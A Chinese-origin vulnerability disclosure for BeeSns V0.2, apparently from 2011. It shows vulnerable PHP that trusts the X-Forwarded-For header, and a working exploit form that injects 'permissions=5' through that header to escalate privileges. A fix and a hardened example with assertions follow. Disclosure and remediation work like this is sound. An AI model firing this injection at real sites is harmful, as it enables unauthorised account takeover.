BeeSns Weibo system V0.2 privilege escalation 0day + exp and fix


Release date: 2011-01-27
Author: Zi Yi
Affected version: BeeSns V0.2
Official address: http://www.beesns.com/
Vulnerability description: the client IP address taken from the X-Forwarded-For (or Client-IP) request header is not validated before it is used in a SQL statement, so a logged-in user can send a crafted header value that is injected into the query and raises their own permission level.

This Weibo system has a nice style and I personally like it. Looking through the code turned up a few problems; here is the code directly.

// obtain the client IP address
function getip() {
    if (isset($_SERVER)) {
        if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
            $realip = $_SERVER['HTTP_X_FORWARDED_FOR'];   // attacker-controlled request header
        } elseif (isset($_SERVER['HTTP_CLIENT_IP'])) {
            $realip = $_SERVER['HTTP_CLIENT_IP'];         // also attacker-controlled
        } else {
            $realip = $_SERVER['REMOTE_ADDR'];            // set by the web server from the TCP peer
        }
    } else {
        if (getenv("HTTP_X_FORWARDED_FOR")) {
            $realip = getenv("HTTP_X_FORWARDED_FOR");
        } elseif (getenv("HTTP_CLIENT_IP")) {
            $realip = getenv("HTTP_CLIENT_IP");
        } else {
            $realip = getenv("REMOTE_ADDR");
        }
    }
    $iphide = explode(".", $realip);

    // Splitting on "." and gluing the first four parts back together is not a filter:
    // everything after the third dot stays in $iphide[3] and is returned verbatim.
    $realip = "$iphide[0].$iphide[1].$iphide[2].$iphide[3]"; //! I don't understand what the author was doing here. The IP address is not filtered, and that is where the vulnerability comes from.
    return $realip;
}

This vulnerability is entirely YY (wishful thinking). --!

EXP:

<?php
print_r('
+---------------------------------------------------------------------------+<br>
BeeSns v0.2 getip() Remote SQL Injection Exploit<br>
site: www.beesns.com<br>
by sub-meter<br>
Blog: http://www.zyday.com<br>

+---------------------------------------------------------------------------+<br>');

if (empty($_POST['submit'])) {
} else {
    error_reporting(7);
    ini_set('max_execution_time', 0);
    $host     = $_POST['host'];
    $path     = $_POST['path'];
    $username = $_POST['username'];
    $password = $_POST['password'];
    send();
}

function send()
{
    global $host, $path, $username, $password;

    // login form fields
    $cmd = "uId=" . $username . "&uPw=" . $password;
    // Injected X-Forwarded-For value. getip() keeps everything after the third dot,
    // so "permissions=5 where uid=... #" reaches the SQL statement that uses the IP.
    $getinj = "1.1.1.1, permissions=5 where uid=$username #";

    // raw HTTP request; each header line must end in CRLF and a blank line ends the headers
    $data  = "POST " . $path . "post.php?act=userLogin HTTP/1.1\r\n";
    $data .= "Accept: */*\r\n";
    $data .= "Accept-Language: zh-cn\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $data .= "Host: $host\r\n";
    $data .= "Content-Length: " . strlen($cmd) . "\r\n";
    $data .= "Connection: Close\r\n";
    $data .= "X-Forwarded-For: $getinj\r\n\r\n";
    $data .= $cmd;

    $fp = fsockopen($host, 80);
    fputs($fp, $data);

    $resp = '';

    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    // success is inferred from the login response body
    if (preg_match('#(.*)charset=UTF-8(.*)1(.*)1(.*)0(.*)#Uis', $resp)) {
        echo "<br><font color=green>Privilege escalation succeeded!</font>";
    } else {
        echo "<font color=red>Failed!</font>";
    }
}
?>
<form action="" method="POST">
Target address: <input type="input" name="host" value="www.zyday.com"> * do not add http://<br>
Second-level directory: <input type="input" name="path" value="/"> * if the site is not in a subdirectory, keep the default value.<br>
User name: <input type="input" name="username"> * an account registered on the target site. <font color=red>Testing with a throwaway account is recommended.</font><br>
Password: <input type="input" name="password"><br>
<input type="submit" name="submit" value="Privilege Escalation"><br>
</form>

Fix: validate the client IP before using it (for example filter_var($ip, FILTER_VALIDATE_IP) and reject anything else), only consult X-Forwarded-For or Client-IP when REMOTE_ADDR is a proxy you operate, since both headers are set by the client, and pass the value to the database as a bound parameter of a prepared statement rather than by string concatenation. The explode()/reassemble step in getip() is not a filter: any payload that contains no dot after the third octet passes through it unchanged.
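As an added example (this is not BeeSns code and not the author's exploit), the block below puts the original getip() logic next to a hardened replacement and checks both against the exploit's X-Forwarded-For value. The original's explode()/reassemble step keeps everything after the third dot in $iphide[3], so the payload comes back unchanged; the hardened version ignores the forwarding headers unless REMOTE_ADDR is a proxy you operate and rejects anything that is not a syntactically valid address. The table and column names in saveLoginIp() are assumptions, because the page does not show the statement that consumes the IP; the point is that the value must reach the database as a bound parameter.

```php
<?php
// Added example, not BeeSns code. Table/column names in saveLoginIp() are assumed.

// The original getip() logic, reproduced only to show what it lets through.
function getip_original(array $server): string
{
    if (isset($server['HTTP_X_FORWARDED_FOR'])) {
        $realip = $server['HTTP_X_FORWARDED_FOR'];
    } elseif (isset($server['HTTP_CLIENT_IP'])) {
        $realip = $server['HTTP_CLIENT_IP'];
    } else {
        $realip = $server['REMOTE_ADDR'];
    }
    $iphide = explode('.', $realip);
    // Everything after the third dot lands in $iphide[3] and is returned verbatim.
    return "$iphide[0].$iphide[1].$iphide[2].$iphide[3]";
}

// Hardened version: forwarding headers are only consulted when the request came
// from a proxy we operate, and only a syntactically valid IP is ever returned.
function getip_safe(array $server, array $trustedProxies = []): string
{
    $remote = $server['REMOTE_ADDR'] ?? '';
    if (!in_array($remote, $trustedProxies, true)) {
        // Direct client: X-Forwarded-For / Client-IP are attacker-controlled, ignore them.
        return filter_var($remote, FILTER_VALIDATE_IP) !== false ? $remote : '0.0.0.0';
    }
    // Behind our own proxy: the proxy appends the peer it saw as the last hop.
    $xff       = $server['HTTP_X_FORWARDED_FOR'] ?? '';
    $hops      = array_map('trim', explode(',', $xff));
    $candidate = end($hops);
    if (filter_var($candidate, FILTER_VALIDATE_IP) !== false) {
        return $candidate;
    }
    return $remote; // header was malformed: fall back to the proxy address
}

// Store the IP through a prepared statement so no value can alter the SQL structure.
// Assumed schema: table bee_user with columns login_ip and uid (not from the page).
function saveLoginIp(PDO $db, int $uid, string $ip): void
{
    $stmt = $db->prepare('UPDATE bee_user SET login_ip = :ip WHERE uid = :uid');
    $stmt->execute([':ip' => $ip, ':uid' => $uid]);
}

// Constructed inputs: the exploit's header value next to a benign one.
$payload = '1.1.1.1, permissions=5 where uid=7 #';
$attack  = ['REMOTE_ADDR' => '198.51.100.20', 'HTTP_X_FORWARDED_FOR' => $payload];
$benign  = ['REMOTE_ADDR' => '10.0.0.1',      'HTTP_X_FORWARDED_FOR' => '203.0.113.5'];
$viaProxy = ['REMOTE_ADDR' => '10.0.0.1',     'HTTP_X_FORWARDED_FOR' => $payload];

assert(getip_original($attack) === $payload);               // payload survives the reassembly
assert(getip_safe($attack) === '198.51.100.20');             // header ignored: not a trusted proxy
assert(getip_safe($benign, ['10.0.0.1']) === '203.0.113.5'); // real client behind our proxy
assert(getip_safe($viaProxy, ['10.0.0.1']) === '10.0.0.1');  // invalid hop rejected, proxy address kept
echo "all checks passed\n";
```

Run it with php on the command line; every assert() must hold. Validating the IP is defence in depth: it stops this particular payload, but the structural fix is binding the value as a parameter, which holds even if some other code path passes a raw string.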
